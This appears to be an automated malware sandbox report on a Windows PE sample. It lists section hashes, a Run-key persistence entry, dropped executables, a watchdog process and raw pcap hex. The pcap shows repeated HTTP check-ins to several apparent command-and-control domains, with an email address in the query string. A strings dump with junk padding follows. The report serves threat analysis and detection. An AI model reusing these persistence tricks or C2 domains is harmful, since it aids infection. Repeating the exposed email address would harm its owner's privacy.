Analysis Date: 2015-05-13 08:49:02

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: e0ac58591b71be11dfd85c7c4e3c3885 sha1: cbdfc002b8aa6e0222827a0b588ef1878be2f135 size: 295936
Section .rdata md5: e756c7dad4445caa804b6b4246fdb47d sha1: d2c84ca6e26c70148140c1da666c821c9c5a11fa size: 34304
Section (name missing from the extracted report) md5: 84809a75cdbd6e73ec167d0832533c89 sha1: 475ce0379d486be23af6c98920bc1a372ac44f7f size: 101376
Timestamp: 2014-10-30 10:05:22
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Discovery Reports Service Time Redirector ➝
C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe

↳ C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe

Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.eh8h
Creates File: C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\ewdsvpl.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rwjzemehoy\oeikqshhj.exe"

Network Details:
DNS queries: Type: A (85 entries; the queried names are missing from the extracted report)
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 666f756e 642e6e65 740d0a0d
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 73756363 6573732e 6e65740d
0x00000080 (00128)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 73747261 69676874 2e6e6574
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 67756172 642e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696361 6972706c 616e652e   lectricairplane.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696367 75617264 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696366 656e6365 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 74677561 72642e6e 65740d0a
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2074   : close..Host: t
0x00000070 (00112)   72616465 67756172 642e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 7466656e 63652e6e 65740d0a
0x00000080 (00128)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6972 656c612e 74726f63   mail=mirela.troc
0x00000020 (00032)   616e406f 69727376 6673652e 726f266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 66656e63 652e6e65 740d0a0d
0x00000080 (00128)   0a0a0d0a 0a0d0a                       .......

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Eqjqdadwc tvjiczou tnoni userka dddudd jmopiea mnpoxumi clog czelu ele fiun lviretgcik djlu lbrua lgke pczada wfija fnhaavnif tdeusar jcwe rafipaptux afyqovn rgz nappogj sjiem amjvunf drekax pticamfju jsgavyn kjnaomctig fseciwsbac cvrote rtnaln zjkalclo ywefeht odx cnucig zdzacfna uqal xzeregf rdgeueo rjgixn ojfgewtm nlrottoe dveab szed hdanevlefe rmbuu psdaldl lprohzt pdge zgkuccdum gtjag beffi mppagbij mbailov uffamuppzu ovcfef mfzoja peicuyanf tju nud dlcez rpsuzkfi jeg fvlu gpijojbfo ocwlu dnpasicpic klb rtfezbqucc dno nopmism gfobumrb glni upbjabbsu sdulem hjnoypeesi ufdr sefoimu zgtebpna lcciqp opfn jujjonpbe btihavucg gdcivkf tsdamcm aibgc wncelrlu faqrov vnutef cfs oxnuc mtrasfji lhba oiosazcapc rjy gkifiwiwr fpi vcpubeds afcaoxunzg vobgo nvjio ebgwoqpyaj cluye wzcab sxgo bmjo zcaoog vnfep nplos tfqisnmoho qapozemp mpnofmiv aegbl abrce budjul dgunafrsa flnu fbdatovli itkudewhmi zdrop bwf sqfuapopju vkehuct anfjojrvia bbpahub gnsaha mpjalugae
- floating point support not loaded
invalid string position
jgco idu dtfab fogmomllu yjenegc eanh ibv ebgpiengbu mafbolop imdmulot usl scsozalcog iko ablzoqoc ninpuj tfciffuc jpcelbdo eudr bkjid abnlegpbac wghibjcuf mlalov zdula cofgu rmbaai snjogcn ftuoka ubei glsujbwapu sazjedzdem leqmumwwal llgaesh cailjedrsu zuxfoneo faogjo lttirzr vbpojws tlzohxda fyletgigun dlotomsg jnepeeu ztmulbcet uid ooq celsiuelgs oodae gmh dbzirj bnnacn ejvyepv glaziffvoz oasucbue gnmu japgomznuz feji wxnilmpezj etyyu pnyif iwsg ngtodey yale rijihohbyo cgdah suck eangikibbz eazfwiil frdaglyo nrbizu bcmuslo rdsuv olosmos vzcesbjil ramnejvqi jaz udk gluha fibm sygopfk fsv ocp jusuhivc gxpuijtg nrocis vebho njzus envrusbgid gbahi njgi cnbaglka xmxucvgi aed idfkujnnua tzca zrgejvdugz fbmeek dmokashta gggodqr lot mleifu dog hpguepzruj nncut fqd tabfaf wsgip sjcoszjia mubvitmfun ifgcapudn pvtovfif ulmla ilbbeoin ufjapoefnr csbaivjyef bnridrli tcce ddaod lgimeb zoms sqbovdpa dirudup nggilev laavl gkcimbpeqw huznivcjar oiabileuj frdifjawip ofefixiqbv fagneblr lnufucwbe ijynu npmofta sbluiofpl iig lcemuuh ubim ghv izqoe coqvu aragmucc ozclezta qfla ldder bsloghb migqult sjrilpl urzreavsto nfoaci bjuluolf klsitf ekb amnmelu jdoqupzz xspej rdvec mgqieurf gjmaprje cmsovmgus mocwolu blo zfjojdwotu sneufefe ellb ilmm fcdeyjfene nbfifbj rjd qujmisfa odtge fjla avzq vsmerb bmipapimr bfsopgpi adobu aomsco blpo ccf nofaejilr aevwqob paevde gpdu zampewid ggimi tfva gdn besvuqd afdlagjnu lxcedtc qpdi lmca witlogefz dnt zux hfgo rcs axnniboapa pnp tubvacp paz sobjeeaixo incmeute mbkem hpba cgefam gcpasizjun bpedouzfp xdo yrijosgdag lbpe enccit bpcaid icmgercnua str gfivedgt djauouroxy ssfawjxuit sszehufbi vtbauxm nftilm rducujjzuc exugri bnwuigibm bvdeumjlac rtm hfcaku epvagiz blaz scq jfj rdbovghepf eqbduenf znda sblaufsniu dgzi kgdoeuwj bctelphos dojhaoccdo bar ojtguatdab mlricn bbam mvdoaczpia lff ljfioxo dydeev vdmeejoto qsfu ucguza tgguul cutsujcum vtueibiae uplrizbad kktibf llbifulsi ganduopilv fkdunoense cybaf sgtida iqdpardu bpsajsgakn eemgzaQ^
j@j ^V
jvbagcdifv fbriosfip tuxdiogple jrbuq bdj lzcehfgox qwb vzhugss kqcukribo fgeaifu tkazojb vqluc mtnesxo lvjuey ffvi nnivifto cmb edfbouo llxe cksinpgu caicpowd ediogpil vcfe bno jnp awy jund rlipijnv kydujcmic ejjzolnz yrcojsj dvbomt xiyj kappoarmm rdu cmeyoo ejudfaai ljgaezjya eegpiluwjs favxabnx psbe odpan ughtudj rdjibpborm ddlioilnv kaowfer idohp hgfufuqx scgod jov llosivjpa gnl fupmicj rmopoeng recbagj iplvarmi jbba spse ddjewdpau movj quuugpabe riguw bsre ulge bdmipl bbwiuszqe xrbizm xodudujjne jyqeb nzceycei
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
